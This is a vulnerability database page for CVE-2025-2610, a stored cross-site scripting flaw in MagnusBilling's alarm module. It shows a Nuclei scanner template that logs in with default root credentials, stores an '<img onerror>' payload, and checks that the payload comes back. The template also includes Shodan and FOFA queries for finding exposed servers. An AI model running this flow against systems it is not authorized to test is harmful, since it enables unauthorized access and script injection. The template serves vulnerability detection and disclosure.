| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-2610 | 21 Mar 202523:20 | โ | circl | |
| MagnusBilling ๅฎๅ จๆผๆด | 21 Mar 202500:00 | โ | cnnvd | |
| CVE-2025-2610 | 21 Mar 202522:35 | โ | cve | |
| CVE-2025-2610 MagnusBilling Stored Cross-Site Scripting in Alarm Module | 21 Mar 202522:35 | โ | cvelist | |
| EUVD-2025-7201 | 3 Oct 202520:07 | โ | euvd | |
| CVE-2025-2610 | 21 Mar 202523:15 | โ | nvd | |
| PT-2025-12458 | 21 Mar 202500:00 | โ | ptsecurity | |
| CVE-2025-2610 | 23 Mar 202523:14 | โ | redhatcve | |
| VulnCheck KEV: CVE-2025-2610 | 21 Mar 202500:00 | โ | vulncheck_kev | |
| CVE-2025-2610 MagnusBilling Stored Cross-Site Scripting in Alarm Module | 21 Mar 202522:35 | โ | vulnrichment |
id: CVE-2025-2610
info:
name: MagnusBilling Alarm Module - Cross-Site Scripting
author: DhiyaneshDK
severity: high
description: |
Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling (Alarm Module modules) allows authenticated stored cross-site scripting. This vulnerability is associated with program files protected/components/MagnusLog.Php.This issue affects MagnusBilling- through 7.3.0.
impact: |
Authenticated attackers can inject malicious HTML and JavaScript through the alarm module that persists and executes when other administrators view alarm configurations, potentially leading to session hijacking and privilege escalation.
remediation: |
Upgrade to MagnusBilling version 7.3.1 or later that properly sanitizes input in the alarm module.
reference:
- https://vulncheck.com/advisories/magnusbilling-logs-xss
- https://chocapikk.com/posts/2025/magnusbilling/
- https://nvd.nist.gov/vuln/detail/CVE-2025-2610
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
cvss-score: 7.6
cve-id: CVE-2025-2610
cwe-id: CWE-79
epss-score: 0.00896
epss-percentile: 0.55104
cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: magnussolution
product: magnusbilling
shodan-query: http.html:"magnusbilling"
fofa-query: body="magnusbilling"
tags: cve,cve2025,mbilling,xss,magnusbilling,authenticated,vkev,vuln
flow: http(1) && http(2) && http(3) && http(4)
variables:
username: "root"
password: "9F4CA770B638615AC5C3E0D2DA16B77C80C2F2C6" # magnus
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- raw:
- |
POST /mbilling/index.php/authentication/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
user={{username}}&password={{password}}&key=
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "success")'
condition: and
internal: true
- raw:
- |
GET /mbilling/index.php/authentication/check?_dc= HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "id_agent")'
condition: and
internal: true
- raw:
- |
POST /mbilling/index.php/alarm/save?_dc= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;
rows={"id":0,"id_plan":0,"type":1,"amount":1,"condition":1,"status":1,"email":"{{email}}","period":3600,"creationdate":null,"subject":"test","message":"<img src=x onerror=alert(document.domain)>"}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Operation was successful")'
condition: and
internal: true
- raw:
- |
GET /mbilling/index.php/alarm/read?_dc=&page=1&start=0&limit=25 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "idPlanname")'
condition: and
# digest: 4a0a0047304502204e8f7b172f77d2c162de4c8aee6597110d02626d78ec782c2b5d513ef71715a3022100fb801b5a3d84870658e4d44115aba8504aeffc64b9d3efea4a2f1342e69c6dc5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation